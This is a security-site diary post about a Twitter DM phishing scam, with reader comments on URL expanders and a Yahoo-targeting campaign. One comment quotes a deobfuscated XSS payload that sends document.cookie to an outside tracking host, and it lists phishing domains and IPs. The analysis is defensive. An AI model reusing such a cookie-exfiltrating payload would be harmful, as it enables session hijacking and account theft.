It's always great to hear from our readers, we just got this note in from Tom on a phish that he recently encountered: One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM: This was just too good an example to pass up writing about. Things to watch out for:
If you've got any other pointers, or if I've missed anything, please use our comment to .. well... comment !
=============== |
Rob VandenBrink 578 Posts ISC Handler May 30th 2012 |
Thread locked Subscribe |
May 30th 2012 1 decade ago |
bit.ly and other URL shortener services have a way to see the hidden address without visiting. Bit.ly used to use an "=" symbol at the end of the URL, but now they have an API for that.
|
AndrewB 24 Posts |
Quote |
May 30th 2012 1 decade ago |
It looks like the Javascript XSS in the WHOIS record for tvviiter.com is only mildly evil, and not related to the phishers. The record for every site registered by XIN NET seems to include it, and (at least when I request it with wget and TOR) the script just writes out an ad banner image and link for XIN NET's own domain registration service. XIN NET has a reputation for being scummy, but that's still pretty impressive behavior for even a semi-legitimate company.
|
ElliotK 1 Posts |
Quote |
May 30th 2012 1 decade ago |
To see what's behind a link created by a URL shortener service, you can use any of the following sites:
http://www.getlinkinfo.com/ http://longurl.org/ |
bartblaze 6 Posts |
Quote |
May 30th 2012 1 decade ago |
_If_ you decide to open a suspicious link, I suggest you first logoff from all webbased sessions you have open, in particular your webmail if that's how you received the link.
For example, Yahoo users were/are targeted as follows: they receive a mail from someone they know asking them to click on a link such as hxxp://www.news15jo.net/biz/ (other hostnames include www.news15de.net and www.inews15ny.net, many more will probably exist, each of them currently resolving to 190.123.43.180, 77.79.14.249, 77.79.13.19, 193.107.19.215, 190.123.43.85, 193.107.19.185, 190.123.43.85, 50.7.246.171). My source (in Dutch): http://www.security.nl/artikel/41676/1/Gevaarlijke_site_als_url_in_de_mail.html hxxp://www.news15jo.net/biz/ looks like a news site, however "get rich quick" is all over the place. For anyone who trusts these guys: "How A single Mom from [location obtained from http://j.maxmind.com/app/geoip.js] unlocked a gold mine and is turning huge profits from home." Just Google for (including the double quotes): "How A single Mom from" "unlocked a gold mine and is turning huge profits from home." In between de calls to various websites the following is interesting (simplified by me): GET /forumCreation/createNewForum?p=aaaa [followed by obfuscated stuff including, deobfuscated: onmousemove="document.location.href='http://trackuk.net/ru/tracking.php?ex='.concat(escape(document.cookie)) ] Host: kr.kpost.yahoo.com Referer: http://www.news15jo.net/biz/toto.php I've not fully investigated this (didn't see any drive-by malware, but some netizens report otherwise). However I assume that if you're still logged on to Yahoo and you click the link, a thread on the KPost (Korea) forum is created by _you_ followed by some magic that causes you to spam everyone in your Yahoo addresslist. PS1 NoScript in Firefox cries XSS. PS2 Google for "/forumCreation/createNewForum?p=aaaa" (including the double qoutes) results in a lot of recent urlquery.net hits. PS3 Apparently this has been going on for some time now, see http://www.workathometruth.com/herman-cain-email-spam-used-by-scammers-to-push-home-business-scams/ |
Erik van Straten 129 Posts |
Quote |
May 30th 2012 1 decade ago |
Sign Up for Free or Log In to start participating in the conversation!